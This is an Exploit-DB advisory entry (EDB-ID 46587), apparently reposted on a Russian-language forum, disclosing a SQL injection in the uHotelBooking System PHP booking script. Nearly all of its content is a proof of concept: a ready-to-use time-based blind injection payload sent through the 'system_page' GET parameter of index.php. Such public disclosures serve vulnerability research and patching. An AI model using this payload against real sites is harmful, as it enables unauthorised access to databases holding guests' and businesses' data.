- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 46587
- Проверка EDB
-
- Пройдено
- Автор
- AHMET ÜMIT BAYRAM
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2019-03-21
uHotelBooking System - 'system_page' SQL Injection
Код:
# Exploit Title: uHotelBooking System - 'system_page' SQL Injection
# Date: 21.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.hotel-booking-script.com
# Demo Site: https://www.hotel-booking-script.com/demo/
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A
# Description: uHotelBooking is a powerful hotel management and online
booking/reservation site script.
----- PoC: SQLi -----
Request: http://localhost/[PATH]/index.php
Vulnerable Parameter: system_page (GET)
Attack Pattern:
http://locahost/[PATH]/index.php?page=3&system_page=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z- Источник
- www.exploit-db.com
